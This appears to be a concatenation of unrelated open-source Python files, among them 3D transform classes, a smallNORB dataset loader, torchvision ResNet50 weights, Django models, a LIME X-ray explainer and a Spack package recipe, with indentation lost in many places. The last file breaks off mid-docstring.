print(f'Expanding: {i}')
shell = shell.compute_normals()
warp = vtk.vtkWarpVector()
warp.SetInputData(shell)
warp.SetInputArrayToProcess(0, 0, 0,
vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS,
vtk.vtkDataSetAttributes.NORMALS)
warp.SetScaleFactor(2)
warp.Update()
shell = pv.wrap(warp.GetOutput())
expanded_mesh = shell.extract_surface()
clus = pyacvd.Clustering(expanded_mesh)
clus.subdivide(3)
clus.cluster(args.points)
shell = clus.create_mesh().extract_surface()
uniform = shell
p = pv.Plotter(notebook=False, shape=(1,1))
p.add_mesh(shell)
p.add_points(np.asarray(uniform.points), color="r",
point_size=8.0, render_points_as_spheres=True)
p.add_mesh(expanded_mesh, smooth_shading=True)
p.link_views()
p.show_bounds()
p.show()
create_pdb_from_points(f'{path.stem}_swarms.pdb', uniform.points)
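# Typical invocation (the script file name is a placeholder; the three positional
# arguments are the input PDB, the distance to the surface, and the number of
# points to generate, as defined in parse_command_line above):
#   python3 surface_sampler.py receptor.pdb 10.0 400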
|
import numpy as np
from .contrib import transformations
from . import math_utils
def translation_matrix(offset):
mat = np.eye(4, dtype=offset.dtype)
mat[:3, 3] = offset
return mat
def apply_translation(mat, offset):
offset_mat = translation_matrix(offset)
mat[...] = np.dot(mat, offset_mat)
return mat
def scale_matrix(scale):
    scale = np.atleast_1d(np.asarray(scale))
    if scale.size == 1:
        # Broadcast a single scale factor to all three axes.
        scale = np.repeat(scale, 3)
    mat = np.eye(4, dtype=scale.dtype)
    mat[:3, :3] = np.diag(scale)
    return mat
def apply_scale(mat, scale):
scale_mat = scale_matrix(scale)
mat[...] = np.dot(mat, scale_mat)
return mat
def x_rotation_matrix(angle, point=None):
rot_mat = transformations.rotation_matrix(angle, [1, 0, 0], point)
return rot_mat
def apply_x_rotation(mat, angle, point=None):
rot_mat = x_rotation_matrix(angle, point)
mat[...] = np.dot(mat, rot_mat)
return mat
def y_rotation_matrix(angle, point=None):
rot_mat = transformations.rotation_matrix(angle, [0, 1, 0], point)
return rot_mat
def apply_y_rotation(mat, angle, point=None):
rot_mat = y_rotation_matrix(angle, point)
mat[...] = np.dot(mat, rot_mat)
return mat
def z_rotation_matrix(angle, point=None):
rot_mat = transformations.rotation_matrix(angle, [0, 0, 1], point)
return rot_mat
def apply_z_rotation(mat, angle, point=None):
rot_mat = z_rotation_matrix(angle, point)
mat[...] = np.dot(mat, rot_mat)
return mat
def rotation_matrix(angle, axis, point=None):
rot_mat = transformations.rotation_matrix(angle, axis, point)
return rot_mat
def apply_rotation(mat, angle, axis, point=None):
rot_mat = rotation_matrix(angle, axis, point)
mat[...] = np.dot(mat, rot_mat)
return mat
class RotationMatrix(object):
"""A rotation represented by a matrix"""
@staticmethod
def identity():
return RotationMatrix(np.eye(3))
@staticmethod
def axis_rotation(angle, axis, point=None):
return RotationMatrix(transformations.rotation_matrix(angle, axis, point)[:3, :3])
@staticmethod
def x_rotation(angle):
return RotationMatrix.axis_rotation(angle, axis=[1, 0, 0])
@staticmethod
def y_rotation(angle):
return RotationMatrix.axis_rotation(angle, axis=[0, 1, 0])
@staticmethod
def z_rotation(angle):
return RotationMatrix.axis_rotation(angle, axis=[0, 0, 1])
def __init__(self, mat, copy=False):
if copy:
mat = np.copy(mat)
assert mat.shape == (3, 3)
self._mat = mat
def apply_to(self, rotation):
return RotationMatrix(np.dot(self._mat, rotation.get_matrix(copy=False)))
def apply_to_vector(self, vec):
assert len(vec) == 3
return np.dot(self._mat, vec)
def get_inverse(self):
return RotationMatrix(np.linalg.inv(self._mat))
def invert(self):
self._mat = np.linalg.inv(self._mat)
def get_transpose(self):
return RotationMatrix(np.transpose(self._mat))
def transpose(self):
self._mat = np.transpose(self._mat)
def get_matrix(self, copy=True):
if copy:
return np.copy(self._mat)
else:
return self._mat
@property
def matrix(self):
return self.get_matrix()
def get_quaternion(self, copy=True):
return transformations.quaternion_from_matrix(self._mat)
@property
def quaternion(self):
return self.get_quaternion()
class Rotation(object):
"""A rotation represented by a quaternion (qx, qy, qz, qw)"""
@staticmethod
def identity():
return Rotation(np.array([0, 0, 0, 1]))
@staticmethod
def axis_rotation(angle, axis, point=None):
return Rotation(RotationMatrix.axis_rotation(angle, axis, point).quaternion)
@staticmethod
def x_rotation(angle):
return Rotation(RotationMatrix.x_rotation(angle).quaternion)
@staticmethod
def y_rotation(angle):
return Rotation(RotationMatrix.y_rotation(angle).quaternion)
@staticmethod
def z_rotation(angle):
return Rotation(RotationMatrix.z_rotation(angle).quaternion)
def __init__(self, quaternion, copy=False):
if copy:
quaternion = np.copy(quaternion)
self._quaternion = quaternion
def apply_to(self, rotation):
return Rotation(math_utils.multiply_quaternion(self._quaternion, rotation.quaternion))
def apply_to_quat(self, quat):
assert len(quat) == 4
return math_utils.multiply_quaternion(self._quaternion, quat)
def apply_to_vector(self, vec):
assert len(vec) == 3
return math_utils.rotate_vector_with_quaternion(self._quaternion, vec)
def get_inverse(self):
return Rotation(math_utils.invert_quaternion(self._quaternion))
def invert(self):
self._quaternion = math_utils.invert_quaternion(self._quaternion)
def get_quaternion(self, copy=True):
if copy:
return np.copy(self._quaternion)
else:
return self._quaternion
@property
def quaternion(self):
return self.get_quaternion()
def get_matrix(self, copy=True):
return transformations.quaternion_matrix(self._quaternion)[:3, :3]
@property
def matrix(self):
return self.get_matrix()
class Transform(object):
"""A rigid transformation represented by a translation vector and rotation quaternion"""
@staticmethod
def from_transformation_matrix(transformation_mat):
transformation_mat = np.asarray(transformation_mat)
transform = TransformMatrix(transformation_mat)
return Transform(transform.translation, transform.quaternion)
@staticmethod
def from_translation_rotation_matrix(translation, rotation_mat):
translation = np.asarray(translation)
rotation_mat = np.asarray(rotation_mat)
quat = RotationMatrix(rotation_mat).quaternion
return Transform(translation, quat)
@staticmethod
def from_translation_quaternion(translation, quat):
translation = np.asarray(translation)
quat = np.asarray(quat)
return Transform(translation, quat)
@staticmethod
def from_translation(translation):
translation = np.asarray(translation)
quat = Rotation.identity().quaternion
return Transform(translation, quat)
@staticmethod
def from_rotation_matrix(rotation_mat):
rotation_mat = np.asarray(rotation_mat)
translation = np.zeros((3,), dtype=rotation_mat.dtype)
quat = RotationMatrix(rotation_mat).quaternion
return Transform(translation, quat)
@staticmethod
def from_quaternion(quat):
quat = np.asarray(quat)
translation = np.zeros((3,), dtype=quat.dtype)
return Transform(translation, quat)
@staticmethod
def from_axis_rotation(angle, axis, point=None):
return Transform.from_transformation_matrix(TransformMatrix.from_axis_rotation(angle, axis, point).matrix)
    @staticmethod
    def from_x_rotation(angle):
        return Transform.from_axis_rotation(angle, axis=[1, 0, 0])
    @staticmethod
    def from_y_rotation(angle):
        return Transform.from_axis_rotation(angle, axis=[0, 1, 0])
    @staticmethod
    def from_z_rotation(angle):
        return Transform.from_axis_rotation(angle, axis=[0, 0, 1])
@staticmethod
    def identity(dtype=np.float64):
return Transform(np.array([0, 0, 0], dtype=dtype), np.array([0, 0, 0, 1], dtype=dtype))
def __init__(self, translation, quaternion, copy=False):
if copy:
translation = np.copy(translation)
quaternion = np.copy(quaternion)
self._translation = translation
self._quaternion = quaternion
def get_inverse(self):
inverse_trans = Transform(self.translation, self.quaternion)
inverse_trans.invert()
return inverse_trans
def invert(self):
self._quaternion = math_utils.invert_quaternion(self._quaternion)
self._translation = - math_utils.rotate_vector_with_quaternion(self._quaternion, self._translation)
def apply_to(self, transform):
assert isinstance(transform, Transform)
new_quaternion = math_utils.multiply_quaternion(self._quaternion, transform.get_quaternion(copy=False))
new_translation = self.apply_to_vector(transform.get_translation(copy=False)) + self._translation
return Transform(new_translation, new_quaternion)
def apply_to_vector(self, vec):
assert len(vec) == 3
return math_utils.rotate_vector_with_quaternion(self._quaternion, vec)
    def get_translation(self, copy=True):
        if copy:
            return np.copy(self._translation)
        else:
            return self._translation
@property
def translation(self):
return self.get_translation()
def get_rotation_matrix(self, copy=True):
return Rotation(self._quaternion).matrix
@property
def rotation_matrix(self):
return self.get_rotation_matrix()
def get_quaternion(self, copy=True):
if copy:
return np.copy(self._quaternion)
else:
return self._quaternion
@property
def quaternion(self):
return self.get_quaternion()
def get_matrix(self, copy=True):
transform_mat = np.eye(4, dtype=self._translation.dtype)
transform_mat[:3, :3] = Rotation(self._quaternion).matrix
        transform_mat[:3, 3] = self._translation
return transform_mat
@property
def matrix(self):
return self.get_matrix()
class TransformMatrix(object):
"""A rigid transformation represented by a 4x4 matrix"""
@staticmethod
def from_translation_rotation_matrix(translation, rotation_mat):
translation = np.asarray(translation)
rotation_mat = np.asarray(rotation_mat)
transformation_mat = np.eye(4, dtype=translation.dtype)
transformation_mat[:3, 3] = translation
transformation_mat[:3, :3] = rotation_mat
return TransformMatrix(transformation_mat)
@staticmethod
def from_translation_quaternion(translation, quat):
translation = np.asarray(translation)
quat = np.asarray(quat)
transformation_mat = np.eye(4, dtype=translation.dtype)
transformation_mat[:3, 3] = translation
transformation_mat[:3, :3] = Rotation(quat).matrix
return TransformMatrix(transformation_mat)
@staticmethod
def from_translation(translation):
translation = np.asarray(translation)
transformation_mat = np.eye(4, dtype=translation.dtype)
transformation_mat[:3, 3] = translation
return TransformMatrix(transformation_mat)
@staticmethod
def from_rotation_matrix(rotation_mat):
rotation_mat = np.asarray(rotation_mat)
transformation_mat = np.eye(4, dtype=rotation_mat.dtype)
transformation_mat[:3, :3] = rotation_mat
return TransformMatrix(transformation_mat)
@staticmethod
def from_quaternion(quat):
quat = np.asarray(quat)
transformation_mat = np.eye(4, dtype=quat.dtype)
transformation_mat[:3, :3] = Rotation(quat).matrix
return TransformMatrix(transformation_mat)
@staticmethod
def from_axis_rotation(angle, axis, point=None):
transformation_mat = transformations.rotation_matrix(angle, axis, point)
return TransformMatrix(transformation_mat)
    @staticmethod
    def from_x_rotation(angle):
        return TransformMatrix.from_axis_rotation(angle, axis=[1, 0, 0])
    @staticmethod
    def from_y_rotation(angle):
        return TransformMatrix.from_axis_rotation(angle, axis=[0, 1, 0])
    @staticmethod
    def from_z_rotation(angle):
        return TransformMatrix.from_axis_rotation(angle, axis=[0, 0, 1])
@staticmethod
    def identity(dtype=np.float64):
        return TransformMatrix(np.eye(4, dtype=dtype))
def __init__(self, transformation_mat, copy=False):
if copy:
transformation_mat = np.copy(transformation_mat)
self._transformation_mat = transformation_mat
def get_inverse(self):
inverse_trans = TransformMatrix(self._transformation_mat)
inverse_trans.invert()
return inverse_trans
def invert(self):
self._transformation_mat = math_utils.invert_matrix(self._transformation_mat)
def apply_to(self, transform):
assert isinstance(transform, TransformMatrix)
new_transformation_mat = np.dot(self._transformation_mat, transform.get_matrix(copy=False))
return TransformMatrix(new_transformation_mat)
def apply_to_vector(self, vec):
if len(vec) == 3:
new_vec = np.dot(self._transformation_mat[:3, :3], vec)
            new_vec += self._transformation_mat[:3, 3]
elif len(vec) == 4:
new_vec = np.dot(self._transformation_mat, vec)
else:
raise ValueError("Vector has to be length 3 or 4")
return new_vec
    def get_translation(self, copy=True):
        if copy:
            return np.copy(self._transformation_mat[:3, 3])
        else:
            return self._transformation_mat[:3, 3]
@property
def translation(self):
return self.get_translation()
def get_rotation_matrix(self, copy=True):
if copy:
return np.copy(self._transformation_mat[:3, :3])
else:
return self._transformation_mat[:3, :3]
@property
def rotation_matrix(self):
return self.get_rotation_matrix()
def get_quaternion(self, copy=True):
        return RotationMatrix(self._transformation_mat[:3, :3]).quaternion
@property
def quaternion(self):
return self.get_quaternion()
def get_matrix(self, copy=True):
if copy:
return np.copy(self._transformation_mat)
else:
return self._transformation_mat
@property
def matrix(self):
return self.get_matrix()
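# Usage sketch (comment only; the translation values are arbitrary). A rigid
# transform composed with its inverse should give back the identity matrix:
#
#   m = TransformMatrix.from_translation([1.0, 2.0, 3.0])
#   assert np.allclose(m.translation, [1.0, 2.0, 3.0])
#   inv = m.get_inverse()
#   assert np.allclose(inv.apply_to(m).matrix, np.eye(4))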
|
import os
import numpy as np
import json
from PIL import Image
from model import *
kernels = buildKernels()
def detect_red_light(I):
'''
This function takes a numpy array <I> and returns a list <bounding_boxes>.
The list <bounding_boxes> should have one element for each red light in the
image. Each element of <bounding_boxes> should itself be a list, containing
four integers that specify a bounding box: the row and column index of the
top left corner and the row and column index of the bottom right corner (in
that order). See the code below for an example.
Note that PIL loads images in RGB order, so:
I[:,:,0] is the red channel
I[:,:,1] is the green channel
I[:,:,2] is the blue channel
'''
bounding_boxes = [] # This should be a list of lists, each of length 4. See format example below.
'''
BEGIN YOUR CODE
'''
bounding_boxes = detect_red_lights(I, kernels, .95)
'''
END YOUR CODE
'''
for i in range(len(bounding_boxes)):
assert len(bounding_boxes[i]) == 4
return bounding_boxes
# set the path to the downloaded data:
data_path = '../data/RedLights2011_Medium'
# set a path for saving predictions:
preds_path = '../data/hw01_preds'
os.makedirs(preds_path,exist_ok=True) # create directory if needed
# get sorted list of files:
file_names = sorted(os.listdir(data_path))
# remove any non-JPEG files:
file_names = [f for f in file_names if '.jpg' in f]
preds = {}
for i in range(len(file_names)):
# read image using PIL:
I = Image.open(os.path.join(data_path,file_names[i]))
# convert to numpy array:
I = np.asarray(I)
preds[file_names[i]] = detect_red_light(I)
# save preds (overwrites any previous predictions!)
with open(os.path.join(preds_path,'preds.json'),'w') as f:
json.dump(preds,f)
|
import warnings
from functools import partial
from typing import Any, List, Optional, Type, Union
from ...models.resnet import BasicBlock, Bottleneck, ResNet
from ..transforms.presets import ImageNetEval
from ._api import Weights, WeightEntry
from ._meta import _IMAGENET_CATEGORIES
__all__ = ["ResNet", "ResNet50Weights", "resnet50"]
def _resnet(
block: Type[Union[BasicBlock, Bottleneck]],
layers: List[int],
weights: Optional[Weights],
progress: bool,
**kwargs: Any,
) -> ResNet:
if weights is not None:
kwargs["num_classes"] = len(weights.meta["categories"])
model = ResNet(block, layers, **kwargs)
if weights is not None:
model.load_state_dict(weights.state_dict(progress=progress))
return model
_common_meta = {
"size": (224, 224),
"categories": _IMAGENET_CATEGORIES,
}
class ResNet50Weights(Weights):
ImageNet1K_RefV1 = WeightEntry(
url="https://download.pytorch.org/models/resnet50-0676ba61.pth",
transforms=partial(ImageNetEval, crop_size=224),
meta={
**_common_meta,
"recipe": "https://github.com/pytorch/vision/tree/main/references/classification",
"acc@1": 76.130,
"acc@5": 92.862,
},
)
ImageNet1K_RefV2 = WeightEntry(
url="https://download.pytorch.org/models/resnet50-tmp.pth",
transforms=partial(ImageNetEval, crop_size=224),
meta={
**_common_meta,
"recipe": "https://github.com/pytorch/vision/issues/3995",
"acc@1": 80.352,
"acc@5": 95.148,
},
)
def resnet50(weights: Optional[ResNet50Weights] = None, progress: bool = True, **kwargs: Any) -> ResNet:
if "pretrained" in kwargs:
warnings.warn("The argument pretrained is deprecated, please use weights instead.")
weights = ResNet50Weights.ImageNet1K_RefV1 if kwargs.pop("pretrained") else None
weights = ResNet50Weights.verify(weights)
return _resnet(Bottleneck, [3, 4, 6, 3], weights, progress, **kwargs)
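# Example call (comment only; this module belongs to the prototype package and
# is meant to be imported, not run directly):
#
#   model = resnet50(weights=ResNet50Weights.ImageNet1K_RefV1)
#   model.eval()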
|
import os
import gzip
import torch
from torch.utils.data import Dataset
import numpy as np
import cv2
from .utils import IMAGE_CHANNELS, IMAGE_HEIGHT, IMAGE_WIDTH, cache_path, ImageDataset, one_hot, file_md5, download_file
from vaetc.utils import debug_print
from struct import unpack
def read_binary_matrix(file_path: str) -> np.ndarray:
SINGLE_PRECISION_MATRIX = 0x1E3D4C51
PACKED_MATRIX = 0x1E3D4C52
DOUBLE_PRECISION_MATRIX = 0x1E3D4C53
INTEGER_MATRIX = 0x1E3D4C54
BYTE_MATRIX = 0x1E3D4C55
SHORT_MATRIX = 0x1E3D4C56
with open(file_path, "rb") as fp:
magic = unpack("<i", fp.read(4))[0]
ndim = unpack("<i", fp.read(4))[0]
dim = tuple(unpack("<i", fp.read(4))[0] for _ in range(max(3, ndim)))[:ndim]
debug_print(ndim, dim)
if magic == INTEGER_MATRIX:
data = np.frombuffer(fp.read(), dtype=np.dtype(np.int32).newbyteorder("<")).reshape(dim)
elif magic == BYTE_MATRIX:
data = np.frombuffer(fp.read(), dtype=np.uint8).reshape(dim)
else:
raise NotImplementedError(f"magic 0x{magic:X}")
return data
class SmallNORB(Dataset):
""" THE small NORB DATASET, V1.0 [huang and LeCun, 2005]
(https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/)
Returns:
ImageDataset
"""
def __init__(self, root, download=False, split="train") -> None:
self.root = root
if self._file_exists():
debug_print(f"File already downloaded at {self.root}")
else:
debug_print(f"File not downloaded yet at {self.root}")
if not download:
raise RuntimeError(f"Dataset not found in {self.root}")
self._download()
self._check_integrity()
if split == "train":
self.dat = read_binary_matrix(os.path.join(self.root, "smallnorb-5x46789x9x18x6x2x96x96-training-dat.mat"))
self.cat = read_binary_matrix(os.path.join(self.root, "smallnorb-5x46789x9x18x6x2x96x96-training-cat.mat"))
self.info = read_binary_matrix(os.path.join(self.root, "smallnorb-5x46789x9x18x6x2x96x96-training-info.mat"))
elif split == "test":
self.dat = read_binary_matrix(os.path.join(self.root, "smallnorb-5x01235x9x18x6x2x96x96-testing-dat.mat"))
self.cat = read_binary_matrix(os.path.join(self.root, "smallnorb-5x01235x9x18x6x2x96x96-testing-cat.mat"))
self.info = read_binary_matrix(os.path.join(self.root, "smallnorb-5x01235x9x18x6x2x96x96-testing-info.mat"))
else:
raise RuntimeError(f"Invalid split {split}")
def __len__(self) -> int:
return self.dat.shape[0]
def __getitem__(self, index):
if torch.is_tensor(index):
index = index.item()
x = self.dat[index].astype(np.float32) / 255
x = x[0] # use only the first camera
x = cv2.resize(x, (IMAGE_WIDTH, IMAGE_HEIGHT), interpolation=cv2.INTER_LINEAR)
x = np.tile(x[None,...], [IMAGE_CHANNELS, 1, 1])
cat = one_hot(self.cat[index], num_classes=5)
info = np.array([
self.info[index,1].astype(float) / 8, # elevation
self.info[index,2].astype(float) / 34, # azimuth
self.info[index,3].astype(float) / 5, # lighting condition
])
t = np.concatenate([cat, info], axis=0).astype(np.float32)
return torch.tensor(x), torch.tensor(t)
def _file_exists(self):
files = (
"smallnorb-5x01235x9x18x6x2x96x96-testing-cat.mat",
"smallnorb-5x01235x9x18x6x2x96x96-testing-dat.mat",
"smallnorb-5x01235x9x18x6x2x96x96-testing-info.mat",
"smallnorb-5x46789x9x18x6x2x96x96-training-cat.mat",
"smallnorb-5x46789x9x18x6x2x96x96-training-dat.mat",
"smallnorb-5x46789x9x18x6x2x96x96-training-info.mat",
)
for name in files:
if not os.path.isfile(os.path.join(self.root, name)):
return False
return True
def _download(self):
if os.path.exists(self.root):
raise RuntimeError(f"Already exists: {self.root}")
urls = (
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x01235x9x18x6x2x96x96-testing-cat.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x01235x9x18x6x2x96x96-testing-dat.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x01235x9x18x6x2x96x96-testing-info.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x46789x9x18x6x2x96x96-training-cat.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x46789x9x18x6x2x96x96-training-dat.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x46789x9x18x6x2x96x96-training-info.mat.gz",
)
for url in urls:
name = url.split("/")[-1]
gz_path = os.path.join(self.root, name)
mat_path = gz_path[:-3]
download_file(url, gz_path, make_dirs=True)
debug_print(f"decompressing {gz_path} ...")
with gzip.open(gz_path, "rb") as fp_gz:
with open(mat_path, "wb") as fp_mat:
while True:
chunk = fp_gz.read(4096)
if len(chunk) == 0: break
fp_mat.write(chunk)
fp_mat.flush()
    def _check_integrity(self) -> None:
        if not self._file_exists():
            raise RuntimeError(f"File not found in {self.root}")
def smallnorb(download=True):
path_to_dataset = cache_path("smallnorb")
training_set = SmallNORB(root=path_to_dataset, download=download, split="train")
test_set = SmallNORB(root=path_to_dataset, download=download, split="test")
return ImageDataset(training_set, test_set)
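# Usage sketch (comment only; the cache location is resolved by cache_path):
#
#   train = SmallNORB(root=cache_path("smallnorb"), download=True, split="train")
#   x, t = train[0]  # x: (C, H, W) float image tensor; t: 5-way one-hot category + 3 normalized pose values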
|
from django.db import models
from Category.models import Category
class City(models.Model):
name = models.CharField(max_length=20, unique=True)
categories = models.ManyToManyField(Category)
def __str__(self):
return self.name
# class Area(models.Model):
# name = models.CharField(max_length=20)
# City = models.ForeignKey(City,on_delete=models.CASCADE)
# def __str__(self):
# return self.name
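# Illustrative ORM usage (comment only; assumes migrations are applied and a
# Category instance named `some_category` already exists):
#
#   city = City.objects.create(name="Cairo")
#   city.categories.add(some_category)
#   str(city)  # -> "Cairo"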
|
"""
dlam trying to make this old 'shorturls' package compatible with 2.0!
"""
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
try:
from importlib import import_module
except ImportError:
from django.utils.importlib import import_module
from shorturls import baseconv
default_converter = baseconv.base62
if hasattr(settings, 'SHORTURLS_DEFAULT_CONVERTER'):
mod_name, conv_name = settings.SHORTURLS_DEFAULT_CONVERTER.rsplit('.', 1)
try:
mod = import_module(mod_name)
except ImportError as e:
raise ImproperlyConfigured(
'Could not load converter specified by SHORTURLS_DEFAULT_CONVERTER. Error was: {0!s}'.format(e))
try:
default_converter = getattr(mod, conv_name)
except AttributeError:
raise ImproperlyConfigured(
'Could not load converter specified by SHORTURLS_DEFAULT_CONVERTER. {0!s} is not in {1!s}.'.format(conv_name, mod))
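# Example (illustrative assumption): the setting is a dotted path to a converter
# object, e.g. the base62 converter bundled with this package:
#
#     SHORTURLS_DEFAULT_CONVERTER = 'shorturls.baseconv.base62'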
|
from thenewboston_node.business_logic.models import (
NodeDeclarationSignedChangeRequestMessage, SignedChangeRequestMessage
)
def test_can_deserialize_from_base_class():
instance = SignedChangeRequestMessage.deserialize_from_dict({
'signed_change_request_type': 'nd',
'node': {
'network_addresses': ['00ee'],
'fee_amount': 3,
'identifier': '00aa'
}
})
assert isinstance(instance, NodeDeclarationSignedChangeRequestMessage)
assert instance.signed_change_request_type == 'nd'
assert instance.node.network_addresses == ['00ee']
assert instance.node.fee_amount == 3
assert instance.node.identifier == '00aa'
def test_can_deserialize_from_child_class_with_signed_change_request_type():
instance = NodeDeclarationSignedChangeRequestMessage.deserialize_from_dict({
'signed_change_request_type': 'nd',
'node': {
'network_addresses': ['00ee'],
'fee_amount': 3,
'identifier': '00aa'
}
})
assert isinstance(instance, NodeDeclarationSignedChangeRequestMessage)
assert instance.signed_change_request_type == 'nd'
assert instance.node.network_addresses == ['00ee']
assert instance.node.fee_amount == 3
assert instance.node.identifier == '00aa'
def test_can_deserialize_from_child_class_without_signed_change_request_type():
instance = NodeDeclarationSignedChangeRequestMessage.deserialize_from_dict({
'node': {
'network_addresses': ['00ee'],
'fee_amount': 3,
'identifier': '00aa'
}
})
assert isinstance(instance, NodeDeclarationSignedChangeRequestMessage)
assert instance.signed_change_request_type == 'nd'
assert instance.node.network_addresses == ['00ee']
assert instance.node.fee_amount == 3
assert instance.node.identifier == '00aa'
|
import random
# TODO: Get this outta here!
spinner_choice = random.choice(['aesthetic', 'arc', 'arrow3', 'betaWave', 'balloon',
'bounce', 'bouncingBar', 'circle', 'dots', 'line', 'squish', 'toggle10', 'pong'])
# TODO: Replace these removed soundtracks
soundtrack_files = [
"talc_soundtrack.mp3",
"talc_soundtrack2.mp3",
"talc_soundtrack3.mp3",
"talc_soundtrack4.mp3",
# "talc_soundtrack5.mp3",
]
prog = "TALC"
author = "Tyler Weston"
# version = '0.0.5'
size = 1280, 720
USE_PROMPTS = False
USE_OPENAI = False
DETECT_FACES = True
# noise_glitching = False
NUM_SMMRY_SENTENCES = 8
MINIMUM_ARTICLE_LENGTH = 10000
# GLITCH_VIDEOS = False
# GLITCH_VIDEOS_PERCENT = 0.3
USE_MOVIEPY_VIDEO_FX = True
MOVIEPY_VIDEO_FX_PERCENT = 0.8
DEFAULT_IMAGES_PER_SEARCH = 3
CLEANUP_ON_FINISH = True
|
from lime.lime_image import *
import pandas as pd
import yaml
import os
import datetime
import dill
import cv2
import numpy as np
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from src.visualization.visualize import visualize_explanation
from src.predict import predict_instance, predict_and_explain
from src.data.preprocess import remove_text
def setup_lime():
'''
Load relevant information and create a LIME Explainer
:return: dict containing important information and objects for explanation experiments
'''
# Load relevant constants from project config file
cfg = yaml.full_load(open(os.getcwd() + "/config.yml", 'r'))
lime_dict = {}
lime_dict['NUM_SAMPLES'] = cfg['LIME']['NUM_SAMPLES']
lime_dict['NUM_FEATURES'] = cfg['LIME']['NUM_FEATURES']
lime_dict['IMG_PATH'] = cfg['PATHS']['IMAGES']
lime_dict['RAW_DATA_PATH'] = cfg['PATHS']['RAW_DATA']
lime_dict['IMG_DIM'] = cfg['DATA']['IMG_DIM']
lime_dict['PRED_THRESHOLD'] = cfg['PREDICTION']['THRESHOLD']
lime_dict['CLASSES'] = cfg['DATA']['CLASSES']
lime_dict['CLASS_MODE'] = cfg['TRAIN']['CLASS_MODE']
lime_dict['COVID_ONLY'] = cfg['LIME']['COVID_ONLY']
KERNEL_WIDTH = cfg['LIME']['KERNEL_WIDTH']
FEATURE_SELECTION = cfg['LIME']['FEATURE_SELECTION']
# Load train and test sets
lime_dict['TRAIN_SET'] = pd.read_csv(cfg['PATHS']['TRAIN_SET'])
lime_dict['TEST_SET'] = pd.read_csv(cfg['PATHS']['TEST_SET'])
# Create ImageDataGenerator for test set
test_img_gen = ImageDataGenerator(preprocessing_function=remove_text,
samplewise_std_normalization=True, samplewise_center=True)
test_generator = test_img_gen.flow_from_dataframe(dataframe=lime_dict['TEST_SET'], directory=cfg['PATHS']['RAW_DATA'],
x_col="filename", y_col='label_str', target_size=tuple(cfg['DATA']['IMG_DIM']), batch_size=1,
class_mode='categorical', validate_filenames=False, shuffle=False)
lime_dict['TEST_GENERATOR'] = test_generator
# Define the LIME explainer
lime_dict['EXPLAINER'] = LimeImageExplainer(kernel_width=KERNEL_WIDTH, feature_selection=FEATURE_SELECTION,
verbose=True)
dill.dump(lime_dict['EXPLAINER'], open(cfg['PATHS']['LIME_EXPLAINER'], 'wb')) # Serialize the explainer
# Load trained model's weights
lime_dict['MODEL'] = load_model(cfg['PATHS']['MODEL_TO_LOAD'], compile=False)
return lime_dict
def explain_xray(lime_dict, idx, save_exp=True):
'''
Make a prediction and provide a LIME explanation
:param lime_dict: dict containing important information and objects for explanation experiments
:param idx: index of image in test set to explain
:param save_exp: Boolean indicating whether to save the explanation visualization
'''
# Get i'th preprocessed image in test set
lime_dict['TEST_GENERATOR'].reset()
for i in range(idx + 1):
x, y = lime_dict['TEST_GENERATOR'].next()
x = np.squeeze(x, axis=0)
# Get the corresponding original image (no preprocessing)
orig_img = cv2.imread(lime_dict['RAW_DATA_PATH'] + lime_dict['TEST_SET']['filename'][idx])
new_dim = tuple(lime_dict['IMG_DIM'])
orig_img = cv2.resize(orig_img, new_dim, interpolation=cv2.INTER_NEAREST) # Resize image
# Make a prediction for this image and retrieve a LIME explanation for the prediction
start_time = datetime.datetime.now()
explanation, probs = predict_and_explain(x, lime_dict['MODEL'], lime_dict['EXPLAINER'],
lime_dict['NUM_FEATURES'], lime_dict['NUM_SAMPLES'])
print("Explanation time = " + str((datetime.datetime.now() - start_time).total_seconds()) + " seconds")
# Get image filename and label
img_filename = lime_dict['TEST_SET']['filename'][idx]
label = lime_dict['TEST_SET']['label'][idx]
# Rearrange prediction probability vector to reflect original ordering of classes in project config
probs = [probs[0][lime_dict['CLASSES'].index(c)] for c in lime_dict['TEST_GENERATOR'].class_indices]
# Visualize the LIME explanation and optionally save it to disk
if save_exp:
file_path = lime_dict['IMG_PATH']
else:
file_path = None
    if lime_dict['COVID_ONLY']:
label_to_see = lime_dict['TEST_GENERATOR'].class_indices['COVID-19']
else:
label_to_see = 'top'
_ = visualize_explanation(orig_img, explanation, img_filename, label, probs, lime_dict['CLASSES'], label_to_see=label_to_see,
dir_path=file_path)
return
if __name__ == '__main__':
lime_dict = setup_lime()
i = 0 # Select i'th image in test set
explain_xray(lime_dict, i, save_exp=True) # Generate explanation for image
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class Libslirp(MesonPackage):
"""General purpose TCP-IP emulator"""
homepage = 'https://gitlab.freedesktop.org/slirp/libslirp'
url = 'https://gitlab.freedesktop.org/slirp/libslirp/-/archive/v4.6.1/libslirp-v4.6.1.tar.gz'
maintainers = ['bernhardkaindl']
version('4.6.1', sha256='69ad4df0123742a29cc783b35de34771ed74d085482470df6313b6abeb799b11')
depends_on('pkgconfig', type='build')
depends_on('glib')
|
from libya_elections.admin_models import LibyaAdminModel
from libya_elections.admin_site import admin_site
from .models import Subscription
class SubscriptionAdmin(LibyaAdminModel):
list_display = ['__str__', 'get_subscription_type_display']
list_filter = ['subscription_type']
raw_id_fields = ['user']
admin_site.register(Subscription, SubscriptionAdmin)
|
"""The expected interface for all learner implementations."""
from abc import ABC, abstractmethod
from typing import Any, Sequence, Dict, Union, Tuple, Optional
from coba.simulations import Context, Action, Key
class Learner(ABC):
"""The interface for Learner implementations."""
@property
@abstractmethod
def family(self) -> str:
"""The family of the learner.
This value is used for descriptive purposes only when creating benchmark results.
"""
...
@property
@abstractmethod
def params(self) -> Dict[str,Any]:
"""The parameters used to initialize the learner.
